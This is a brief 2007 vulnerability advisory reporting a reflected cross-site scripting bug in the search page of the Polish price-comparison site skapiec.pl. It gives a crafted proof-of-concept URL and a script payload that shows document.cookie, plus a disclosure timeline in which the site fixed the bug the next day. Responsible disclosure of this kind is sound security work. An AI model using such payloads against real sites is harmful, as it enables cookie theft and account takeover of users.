kanedaaa... ... borys ... bohater ...
+ Subject:
XSS bug for www.skapiec.pl
+ Version:
2007.05.22
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ skapiec.pl Description:
Comparison price in 500 internet shops.
+ Description:
XSS IN:
http://www.skapiec.pl/site/szukaj/?sz=&szukaj=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&dzial=-1&x=38&y=15
Sent data:
"><script>alert(document.cookie);</script>
That is a possibility to take over an user account from http://skapiec.pl, when the logged user would click at specially crafted URL.
Timeline:
2007.05.22 bug discovered
2007.05.22 bug sent via mail from http://www.skapiec.pl/site/doc/1 [uwagi]
2007.05.23 fixed and fast answer via e-mail
Original Advisory: http://kaneda.bohater.net/security/20070522-xss-skapiec.pl.php
Check my other bugs in security section: Security